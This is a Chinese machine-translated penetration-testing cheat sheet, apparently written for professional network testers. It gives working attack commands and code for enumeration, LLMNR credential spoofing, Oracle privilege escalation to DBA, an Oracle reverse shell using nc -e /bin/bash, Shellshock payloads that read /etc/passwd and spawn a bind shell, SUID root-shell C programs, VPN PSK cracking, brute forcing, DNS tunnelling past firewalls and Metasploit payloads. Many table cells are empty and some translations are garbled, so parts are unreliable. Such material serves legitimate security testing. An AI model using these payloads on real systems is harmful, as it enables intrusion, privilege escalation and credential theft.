渗透工具备忘录
渗透测试工具备忘单,是典型渗透测试约定的快速参考高级概述。设计为快速参考备忘单,它提供了第三方笔测试公司在执行手动基础结构渗透测试时将要运行的典型命令的高级概述。有关更多详细信息,我建议使用该工具的手册文件,或者从右侧菜单中选择更具体的笔测试备忘单。
本备忘单的重点是基础架构/网络渗透性测试,这里不讨论Web应用程序渗透性测试,除了最后一些sqlmap命令和一些Web服务器枚举。对于Web应用程序渗透测试,请查阅Web应用程序黑客手册,它非常适合学习和参考。
网络配置
设定IP位址
ifconfig eth0 xxx.xxx.xxx.xxx/24
子网划分
ipcalc xxx.xxx.xxx.xxx/24
ipcalc xxx.xxx.xxx.xxx 255.255.255.0
OSINT
被动信息收集
域名解析
WHOIS枚举
whois domain-name-here.com
执行DNS IP查找
dig a domain-name-here.com @nameserver
执行MX记录查询
dig mx domain-name-here.com @nameserver
用DIG执行区域传输
dig axfr domain-name-here.com @nameserver
DNS区域转移
命令 | 描述 |
---|---|
|
Windows DNS区域传输 |
|
Linux DNS区域传输 |
电子邮件
只需发送电子邮件
使用Simply Email枚举所有在线位置(github,目标站点等),如果您使用代理服务器或设置较长的油门时间,则效果更好,因此Google不会认为您是机器人,而是会填写验证码。
git clone https://github.com/killswitch-GUI/SimplyEmail.git
./SimplyEmail.py -all -e TARGET-DOMAIN
Simply Email可以在收集后验证发现的电子邮件地址。
半主动信息收集
基本指纹
手动指纹/横幅抓取。
命令 | 描述 |
---|---|
|
基本版本控制/通过显示的横幅进行指纹打印 |
用NC抓横幅
nc TARGET-IP 80
GET / HTTP/1.1
Host: TARGET-IP
User-Agent: Mozilla/5.0
Referrer: meh-domain
<enter>
主动信息收集
DNS暴力破解
域名解析
DNS枚举Kali-DNSRecon
root:〜# dnsrecon -d目标-D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml
端口扫描
Nmap命令
有关更多命令,请参见Nmap备忘单(右侧菜单中的链接)。
基本的Nmap命令:
命令 | 描述 |
---|---|
|
Nmap详细扫描,运行同步隐身,T4定时(在局域网上应该可以),操作系统和服务版本信息,针对服务的traceroute和脚本 |
|
如上,但是扫描所有TCP端口(花费更长的时间) |
|
如上,但是扫描所有TCP端口和UDP扫描(需要更长的时间) |
|
Nmap脚本来扫描易受攻击的SMB服务器-警告:不安全= 1可能会导致故障转移 |
|
在nmap脚本中搜索关键字 |
我有几个人提到过T4扫描,请在此处应用常识。不要在外部笔测试中使用T4命令(使用Internet连接时),最好将T2与TCP连接扫描一起使用。在具有足够带宽的低延迟链接上,T4扫描可能更适合内部笔测试。但是,这一切都取决于目标设备,如果您使用T4 / T5嵌入式设备并给出不确定的结果,则嵌入式设备将难以应对。作为一般的经验法则,请尽可能缓慢地扫描,或对前1000名进行快速扫描,以便可以开始笔测试,然后开始较慢的扫描。
Nmap UDP扫描
nmap -sU TARGET
UDP协议扫描器
git clone https://github.com/portcullislabs/udp-proto-scanner.git
扫描IP地址文件以获取所有服务:
./udp-protocol-scanner.pl -f ip.txt
扫描特定的UDP服务:
udp-proto-scanner.pl -p ntp -f ips.txt
其他主机发现
其他主机发现方法,不使用nmap…
命令 | 描述 |
---|---|
|
从ARP查找子网上的IP,MAC地址和MAC供应商,有助于确认您在$ client站点上的正确VLAN中 |
枚举和攻击网络服务
渗透测试工具可专门识别和/或枚举网络服务:
SAMB / SMB / Windows域枚举
Samba枚举
SMB枚举工具
nmblookup -A target
smbclient //MOUNT/share -I target -N
rpcclient -U "" target
enum4linux target
另请参阅nbtscan备忘单(右侧菜单)。
命令 | 描述 |
---|---|
|
发现子网中的Windows / Samba服务器,找到Windows MAC地址,netbios名称并发现客户端工作组/域 |
|
做所有事情,运行除基于字典的共享名猜测之外的所有选项(查找Windows客户端域/工作组) |
指纹SMB版本
smbclient -L //192.168.1.100
查找公开的SMB共享
nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.1.0/24
枚举SMB用户
nmap -sU -sS --script=smb-enum-users -p U:137,T:139 192.168.11.200-254
python /usr/share/doc/python-impacket-doc/examples
/samrdump.py 192.168.XXX.XXX
RID骑行:
ridenum.py 192.168.XXX.XXX 500 50000 dict.txt
用于RID循环的Metasploit模块:
use auxiliary/scanner/smb/smb_lookupsid
手动Null会话测试:
视窗:
net use \\TARGET\IPC$ "" /u:""
Linux:
smbclient -L //192.168.99.131
NBTScan unixwiz
安装在Kali上:
apt-get install nbtscan-unixwiz
nbtscan-unixwiz -f 192.168.0.1-254 > nbtscan
LLMNR / NBT-NS欺骗
从网络窃取凭据。
Metasploit LLMNR / NetBIOS请求
欺骗/中毒LLMNR / NetBIOS请求:
auxiliary/spoof/llmnr/llmnr_response
auxiliary/spoof/nbns/nbns_response
捕获哈希:
auxiliary/server/capture/smb
auxiliary/server/capture/http_ntlm
您最终将获得NTLMv2哈希,请使用john或hashcat对其进行破解。
响应者
或者,您可以使用响应者。
git clone https://github.com/SpiderLabs/Responder.git
python Responder.py -i local-ip -I eth0
运行Responder.py进行整个互动
在处理其他攻击媒介时,运行Responder.py进行互动。
SNMP枚举工具
许多SNMP枚举工具。
修复SNMP输出值,以使其易于阅读:
apt-get install snmp-mibs-downloader download-mibs
echo "" > /etc/snmp/snmp.conf
命令 | 描述 |
---|---|
|
SNMP枚举 |
SNMPv3枚举工具
使用nmap识别SNMPv3服务器:
nmap -sV -p 161 --script=snmp-info TARGET-SUBNET
Rory McCune的snmpwalk包装器脚本有助于自动化SNMPv3的用户名枚举过程:
apt-get install snmp snmp-mibs-downloader
wget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb
使用Metasploits词汇表
Metasploit的单词表(下面的KALI路径)具有SNMP v1和2的通用凭据,对于较新的凭据,请查看GitHub上的Daniel Miessler的SecLists项目(而不是邮件列表!)。
/usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt
R服务枚举
这是遗留的,包括完整性。
nmap -A将执行下面列出的所有rservices枚举,添加此部分是为了完整性或手动确认:
RSH枚举
RSH运行命令
rsh <target> <command>
Metasploit RSH登录扫描仪
auxiliary/scanner/rservices/rsh_login
rusers显示已登录的用户
rusers -al 192.168.2.1
rusers扫描整个子网
rlogin -l <user> <target>
例如rlogin -l root TARGET-SUBNET / 24
手指枚举
finger @TARGET-IP
手指一个特定的用户名
finger batman@TARGET-IP
显示所有已登录用户的Solaris错误:
finger 0@host
SunOS: RPC services allow user enum:
$ rusers # users logged onto LAN
finger 'a b c d e f g h'@sunhost
谁
使用nmap识别运行rwhod(513 UDP)的计算机
TLS和SSL测试
testssl.sh
在单个主机上测试所有内容并输出到.html文件:
./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U TARGET-HOST | aha > OUTPUT-FILE.html
漏洞评估
在Kali Rolling上安装OpenVAS 8:
apt-get update
apt-get dist-upgrade -y
apt-get install openvas
openvas-setup
使用以下命令验证openvas是否正在运行:
netstat -tulpn
登录https://127.0.0.1:9392-在openvas-setup期间生成凭据。
数据库渗透测试
攻击网络上暴露的数据库服务器。
甲骨文
安装oscanner:
apt-get install oscanner
运行oscanner:
oscanner -s 192.168.1.200 -P 1521
指纹Oracle TNS版本
安装tnscmd10g:
apt-get install tnscmd10g
指纹Oracle TNS:
tnscmd10g version -h TARGET
nmap --script=oracle-tns-version
蛮力Oracle用户帐户
识别默认的Oracle帐户:
nmap --script=oracle-sid-brute
nmap --script=oracle-brute
针对Oracle TNS运行nmap脚本:
nmap -p 1521 -A TARGET
Oracle特权升级
要求:
- Oracle需要在网络上公开
- 使用默认帐户,例如scott
快速概述:
- 创建功能
- 在表SYS.DUAL上创建索引
- 我们刚刚创建的索引执行我们的函数SCOTT.DBA_X
- 该函数将由SYS用户执行(因为拥有该表的用户)。
- 使用DBA特权创建帐户
在下面的示例中,使用了用户SCOTT,但是使用另一个默认的Oracle帐户应该可以实现。
使用NMAP NSE脚本识别oracle db中的默认帐户:
nmap --script=oracle-sid-brute
nmap --script=oracle-brute
使用已识别的弱帐户登录(假设您找到一个)。
如何为oracle用户标识当前特权级别:
SQL> select * from session_privs;
SQL> CREATE OR REPLACE FUNCTION GETDBA(FOO varchar) return varchar deterministic authid
curren_user is
pragma autonomous_transaction;
begin
execute immediate 'grant dba to user1 identified by pass1';
commit;
return 'FOO';
end;
Oracle priv esc并获得DBA访问权限:
运行netcat:netcat -nvlp 443
代码>
SQL> create index exploit_1337 on SYS.DUAL(SCOTT.GETDBA('BAR'));
使用选择查询运行漏洞利用:
SQL> Select * from session_privs;
您应该有一个DBA用户,其凭据为user1和pass1。
通过再次重新运行第一个命令来验证您是否具有DBA特权。
使用以下方法删除漏洞:
drop index exploit_1337;
获取Oracle Reverse os-shell:
begin
dbms_scheduler.create_job( job_name => 'MEH1337',job_type =>
'EXECUTABLE',job_action => '/bin/nc',number_of_arguments => 4,start_date =>
SYSTIMESTAMP,enabled => FALSE,auto_drop => TRUE);
dbms_scheduler.set_job_argument_value('rev_shell', 1, 'TARGET-IP');
dbms_scheduler.set_job_argument_value('rev_shell', 2, '443');
dbms_scheduler.set_job_argument_value('rev_shell', 3, '-e');
dbms_scheduler.set_job_argument_value('rev_shell', 4, '/bin/bash');
dbms_scheduler.enable('rev_shell');
end;
微软SQL
枚举/发现:
Nmap:
nmap -sU --script=ms-sql-info 192.168.1.108 192.168.1.156
Metasploit:
msf > use auxiliary/scanner/mssql/mssql_ping
使用MS SQL Server浏览更多
尝试通过MS SQL Server Management Studio使用“更多浏览”
Bruteforce MSSQL登录
msf > use auxiliary/admin/mssql/mssql_enum
Metasploit MSSQL Shell
msf > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
网络
Plink.exe隧道
腻子链接隧道
将远程端口转发到本地地址:
plink.exe -P 22 -l root -pw "1337" -R 445:127.0.0.1:445 REMOTE-IP
旋转
SSH透视
ssh -D 127.0.0.1:1010 -p 22 user@pivot-target-ip
在/etc/proxychains.conf中添加socks4 127.0.0.1 1010
SSH从一个网络转到另一个网络:
ssh -D 127.0.0.1:1010 -p 22 user1@ip-address-1
在/etc/proxychains.conf中添加socks4 127.0.0.1 1010
proxychains ssh -D 127.0.0.1:1011 -p 22 user1@ip-address-2
在/etc/proxychains.conf中添加socks4 127.0.0.1 1011
Meterpreter枢轴
TTL指纹
操作系统 | TTL尺寸 |
---|---|
视窗 |
|
的Linux |
|
的Solaris |
|
思科/网络 |
|
IPv4备忘单
IP等级范围
例如A,B,C类(折旧)
类 | IP地址范围 |
---|---|
A类IP地址范围 |
|
B类IP地址范围 |
|
C类IP地址范围 |
|
D类IP地址范围 |
|
E类IP地址范围 |
|
IPv4专用地址范围
类 | 范围 |
---|---|
A类专用地址范围 |
|
B类专用地址范围 |
|
C类专用地址范围 |
|
|
IPv4子网备忘单
子网备忘单,并不是真正适用于笔测试,而是有用的参考。
CIDR | 小数掩码 | 主机数 |
---|---|---|
/ 31 |
|
|
/ 30 |
|
|
/ 29 |
|
|
/ 28 |
|
|
/ 27 |
|
|
/ 26 |
|
|
/ 25 |
|
|
/ 24 |
|
|
/ 23 |
|
|
/ 22 |
|
|
/ 21 |
|
|
/ 20 |
|
|
/ 19 |
|
|
/ 18 |
|
|
/ 17 |
|
|
/ 16 |
|
|
/ 15 |
|
|
/ 14 |
|
|
/ 13 |
|
|
/ 12 |
|
|
/ 11 |
|
|
/ 10 |
|
|
/ 9 |
|
|
/ 8 |
|
|
VLAN跳变
将NCCGroups VLAN包装器脚本用于Yersina可简化该过程。
git clone https://github.com/nccgroup/vlan-hopping.git
chmod 700 frogger.sh
./frogger.sh
VPN渗透测试工具
识别VPN服务器:
./udp-protocol-scanner.pl -p ike TARGET(s)
扫描范围内的VPN服务器:
./udp-protocol-scanner.pl -p ike -f ip.txt
宜家
使用IKEForce枚举或词典攻击VPN服务器。
安装:
pip install pyip
git clone https://github.com/SpiderLabs/ikeforce.git
使用IKEForce执行IKE VPN枚举:
./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic
使用IKEForce的Bruteforce IKE VPN:
./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1
ike-scan
ike-scan TARGET-IP
ike-scan -A TARGET-IP
ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key
IKE积极模式PSK破解
- 识别VPN服务器
- 用IKEForce枚举以获得组ID
- 使用ike-scan从IKE端点捕获PSK哈希
- 使用psk-crack破解哈希
步骤1:识别IKE服务器
./udp-protocol-scanner.pl -p ike SUBNET/24
步骤2:使用IKEForce枚举组名
./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic
步骤3:使用ike-scan捕获PSK哈希
ike-scan –M –A –n example_group -P hash-file.txt TARGET-IP
步骤4:使用psk-crack破解PSK哈希
psk-crack hash-file.txt
以下是一些更高级的psk-crack选项:
pskcrack
psk-crack -b 5 TARGET-IPkey
psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
psk-crack -d /path/to/dictionary-file TARGET-IP-key
PPTP骇客
识别PPTP,它侦听TCP:1723
NMAP PPTP指纹:
nmap –Pn -sV -p 1723 TARGET(S)
PPTP词典攻击
thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst
DNS隧道
通过DNS隧道传输数据以绕过防火墙。
dnscat2支持“下载”和“上传”命令,用于从目标计算机获取文件(数据和程序)。
攻击机
安装:
apt-get update
apt-get -y install ruby-dev git make g++
gem install bundler
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server
bundle install
运行dnscat2:
ruby ./dnscat2.rb
dnscat2> New session established: 1422
dnscat2> session -i 1422
目标机器:
https://downloads.skullsecurity.org/dnscat2/ https://github.com/lukebaggett/dnscat2-powershell/
dnscat --host <dnscat server_ip>
BOF /漏洞利用
利用研究
查找枚举主机/服务的漏洞。
命令 | 描述 |
---|---|
|
搜索exploit-db以进行利用,在此示例中为Windows 2003 + local esc |
|
使用Google搜索exploit-db.com中的漏洞 |
|
使用grep搜索metasploit模块-msf搜索很烂 |
搜索漏洞
安装exploit-db的本地副本:
searchsploit –u
searchsploit apache 2.2
searchsploit "Linux Kernel"
searchsploit linux 2.6 | grep -i ubuntu | grep local
在Kali上编译Windows漏洞
wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download
wine mingw-get-setup.exe
select mingw32-base
cd /root/.wine/drive_c/windows
wget http://gojhonny.com/misc/mingw_bin.zip && unzip mingw_bin.zip
cd /root/.wine/drive_c/MinGW/bin
wine gcc -o ability.exe /tmp/exploit.c -lwsock32
wine ability.exe
交叉编译漏洞
gcc -m32 -o output32 hello.c (32 bit)
gcc -m64 -o output hello.c (64 bit)
利用常见漏洞
利用Shellshock
查找和利用容易受到Shellshock攻击的服务器的工具:
git clone https://github.com/nccgroup/shocker
./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose
cat文件(查看文件内容)
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80
外壳震动运行绑定外壳
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80
外壳防震外壳
nc -l -p 443
简单的本地Web服务器
Python本地Web服务器命令,方便在攻击计算机上提供shell和漏洞利用。
命令 | 描述 |
---|---|
|
运行基本的http服务器,非常适合提供shell等 |
|
运行基本的Python3 http服务器,非常适合提供shell等 |
|
运行ruby webrick基本的HTTP服务器 |
|
运行基本的PHP http服务器 |
挂载文件共享
如何挂载NFS / CIFS,Windows和Linux文件共享。
命令 | 描述 |
---|---|
|
挂载NFS共享到 |
|
在Linux上挂载Windows CIFS / SMB共享, |
|
从命令行在Windows上挂载Windows共享 |
|
在Kali(用于浏览SMB共享的有用Linux GUI)上安装smb4k |
HTTP / HTTPS Web服务器枚举
命令 | 描述 |
---|---|
|
对目标执行nikto扫描 |
|
通过GUI配置,CLI输入在大多数情况下不起作用 |
包检查
命令 | 描述 |
---|---|
|
接口eth0上端口80的tcpdump,输出到output.pcap |
用户名枚举
用于远程枚举目标系统上的用户的一些技术。
SMB用户枚举
命令 | 描述 |
---|---|
|
枚举SMB中的用户 |
|
RID循环SMB /从SMB枚举用户 |
SNMP用户枚举
命令 | 描述 |
---|---|
|
SNMP的新兴用户 |
|
SNMP的新兴用户 |
|
搜索具有nmap,可重复输出的SNMP服务器 |
密码
词表
命令 | 描述 |
---|---|
|
卡利语单词表 |
蛮力服务
Hydra FTP蛮力
命令 | 描述 |
---|---|
|
Hydra FTP暴力破解 |
九头蛇POP3蛮力
命令 | 描述 |
---|---|
|
九头蛇POP3蛮力 |
Hydra SMTP暴力破解
命令 | 描述 |
---|---|
|
Hydra SMTP暴力破解 |
使用-t
限制并发连接,例如:-t 15
密码破解
密码破解渗透测试工具。
约翰开膛手-JTR
命令 | 描述 |
---|---|
|
JTR密码破解 |
|
JTR用单词表强制解密 |
|
JTR强制解密暴力破解 |
Windows渗透测试命令
请参阅Windows渗透测试命令。
Linux渗透测试命令
有关可用于本地系统枚举的Linux渗透测试命令的列表,请参见Linux命令备忘单(右侧菜单)。
编译漏洞
有关编译漏洞的一些说明。
识别C代码是用于Windows还是Linux
C #includes将指示应使用哪个操作系统来构建漏洞利用程序。
命令 | 描述 |
---|---|
|
Windows漏洞利用代码 |
|
Linux利用代码 |
建立利用GCC
编译利用gcc。
命令 | 描述 |
---|---|
|
基本的GCC编译 |
GCC在64Bit Kali上编译32Bit漏洞
便于在64位攻击机上交叉编译32位二进制文件。
命令 | 描述 |
---|---|
|
在64位Linux上交叉编译32位二进制文件 |
在Linux上编译Windows .exe
在Linux上构建/编译Windows漏洞,生成一个.exe文件。
命令 | 描述 |
---|---|
|
在Linux上编译Windows .exe |
SUID二进制
通常,需要SUID C二进制文件以超级用户身份生成外壳,您可以根据需要更新UID / GID和外壳。
以下是各种shell的一些快速复制和粘贴示例:
用于/ bin / bash的SUID C Shell
int main(void){
setresuid(0, 0, 0);
system("/bin/bash");
}
用于/ bin / sh的SUID C Shell
int main(void){
setresuid(0, 0, 0);
system("/bin/sh");
}
构建SUID Shell二进制文件
gcc -o suid suid.c
对于32位:
gcc -m32 -o suid suid.c
反壳
有关有用的反向外壳列表,请参见“ 反向外壳备忘单 ”。
TTY弹壳
技巧/窍门,用于从Linux中的受限shell中生成TTY shell,对于su
从反向shell 运行命令非常有用。
Python TTY Shell技巧
python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
Spawn Interactive sh shell
/bin/sh -i
Spawn Perl TTY外壳
exec "/bin/sh";
perl —e 'exec "/bin/sh";'
Spawn Ruby TTY外壳
exec "/bin/sh"
Spawn Lua TTY外壳
os.execute('/bin/sh')
Vi的Spawn TTY Shell
从vi运行shell命令:
:!bash
Spawn TTY Shell NMAP
!sh
Metasploit备忘单
我发现方便参考的基本metasploit备忘单。
可供参考的基本Metasploit命令,可用于透视,请参阅-Meterpreter透视技术。
Meterpreter有效负载
Windows反向抄表器有效负载
命令 | 描述 |
---|---|
|
Windows反向TCP有效负载 |
Windows VNC Meterpreter有效负载
命令 | 描述 |
---|---|
|
Meterpreter Windows VNC有效负载 |
Linux反向Meterpreter有效负载
命令 | 描述 |
---|---|
|
Meterpreter Linux反向有效负载 |
Meterpreter作弊表
有用的meterpreter命令。
命令 | 描述 |
---|---|
|
Meterpreter将文件上传到Windows目标 |
|
从Windows目标下载Meterpreter文件 |
|
从Windows目标下载Meterpreter文件 |
|
Meterpreter在目标上运行.exe-方便执行上传的漏洞 |
|
使用cmd shell创建新频道 |
|
Meterpreter显示流程 |
|
Meterpreter使外壳对准目标 |
|
Meterpreter尝试特权升级目标 |
|
Meterpreter尝试将哈希值转储到目标上 |
|
Meterpreter创建端口转发到目标计算机 |
|
Meterpreter删除端口转发 |
通用Metasploit模块
顶级metasploit模块。
远程Windows Metasploit模块(漏洞利用)
命令 | 描述 |
---|---|
|
MS08_067 Windows 2k,XP,2003远程利用 |
|
MS08_040 Windows NT,2k,XP,2003远程利用 |
|
MS09_050 Windows Vista SP1 / SP2和Server 2008(x86)远程利用 |
本地Windows Metasploit模块(漏洞利用)
命令 | 描述 |
---|---|
|
在Windows 7上绕过UAC +设置目标+拱门,x86 / 64 |
辅助Metasploit模块
命令 | 描述 |
---|---|
|
Metasploit HTTP目录扫描程序 |
|
Metasploit JBOSS漏洞扫描程序 |
|
Metasploit MSSQL凭据扫描仪 |
|
Metasploit MSSQL版本扫描程序 |
|
Metasploit Oracle登录模块 |
Metasploit Powershell模块
命令 | 描述 |
---|---|
|
Metasploit Powershell负载交付模块 |
|
Metasploit通过会话上传并运行Powershell脚本 |
|
Metasploit JBOSS部署 |
|
Metasploit MSSQL有效负载 |
发布利用Windows Metasploit模块
Windows Metasploit模块,用于特权升级。
命令 | 描述 |
---|---|
|
Metasploit显示当前用户的特权 |
|
Metasploit抢GPP保存的密码 |
|
元分裂负载Mimikatz |
|
识别提供的域用户具有管理访问权限的其他计算机 |
|
自动转储sam文件,尝试esc特权等 |
ASCII表备忘单
对于Web应用程序渗透测试很有用,或者如果您在火星上受困并且需要与NASA进行通信时很有用。
ASCII码 | 字符 |
---|---|
|
空字节 |
|
学士学位 |
|
标签 |
|
如果 |
|
CR |
|
退出 |
|
SPC |
|
! |
|
” |
|
# |
|
$ |
|
% |
|
和 |
|
` |
|
( |
|
) |
|
* |
|
+ |
|
, |
|
-- |
|
。 |
|
/ |
|
0 |
|
1个 |
|
2 |
|
3 |
|
4 |
|
5 |
|
6 |
|
7 |
|
8 |
|
9 |
|
: |
|
; |
|
< |
|
= |
|
> |
|
? |
|
@ |
|
一种 |
|
乙 |
|
C |
|
d |
|
Ë |
|
F |
|
G |
|
H |
|
一世 |
|
Ĵ |
|
ķ |
|
大号 |
|
中号 |
|
ñ |
|
Ø |
|
P |
|
问 |
|
[R |
|
小号 |
|
Ť |
|
ü |
|
V |
|
w ^ |
|
X |
|
ÿ |
|
ž |
|
[ |
|
\ |
|
] |
|
^ |
|
_ |
|
` |
|
一种 |
|
b |
|
C |
|
d |
|
Ë |
|
F |
|
G |
|
H |
|
一世 |
|
Ĵ |
|
ķ |
|
升 |
|
米 |
|
ñ |
|
Ø |
|
p |
|
q |
|
[R |
|
s |
|
Ť |
|
ü |
|
v |
|
w |
|
X |
|
ÿ |
|
ž |
CISCO IOS命令
有用的Cisco IOS命令的集合。
命令 | 描述 |
---|---|
|
进入启用模式 |
|
简称,配置终端 |
|
配置FastEthernet 0/0 |
|
将IP添加到fa0 / 0 |
|
将IP添加到fa0 / 0 |
|
配置VTY线 |
|
思科设置telnet密码 |
|
设置telnet密码 |
|
显示内存中正在运行的配置 |
|
显示sartup配置 |
|
显示Cisco IOS版本 |
|
显示公开会议 |
|
显示网络接口 |
|
显示详细的界面信息 |
|
显示路线 |
|
显示访问清单 |
|
显示可用文件 |
|
档案资讯 |
|
如何删除文件 |
|
端子输出无限制 |
|
将正在运行的配置复制到tftp服务器 |
|
将启动配置复制到运行配置 |
密码学
散列长度
杂凑 | 尺寸 |
---|---|
MD5哈希长度 |
|
SHA-1哈希长度 |
|
SHA-256哈希长度 |
|
SHA-512哈希长度 |
|
哈希示例
可能仅为此使用哈希标识符,但这是一些示例哈希:
杂凑 | 例 |
---|---|
MD5哈希示例 |
|
MD5 $ PASS:$ SALT示例 |
|
MD5 $ SALT:$ PASS |
|
SHA1哈希示例 |
|
SHA1 $ PASS:$ SALT |
|
SHA1 $ SALT:$ PASS |
|
SHA-256 |
|
SHA-256 $ PASS:$ SALT |
|
SHA-256 $ SALT:$ PASS |
|
SHA-512 |
|
SHA-512 $ PASS:$ SALT |
|
SHA-512 $ SALT:$ PASS |
|
NTLM哈希示例 |
|
SQLMap示例
迷你SQLMap速查表:
命令 | 描述 |
---|---|
|
自动化sqlmap扫描 |
|
有针对性的sqlmap扫描 |
|
使用mysql后端扫描URL进行联合+基于错误的注入, |
|
sqlmap注入检查表 |
|
表用户在数据库名称上的sqlmap转储和破解哈希。 |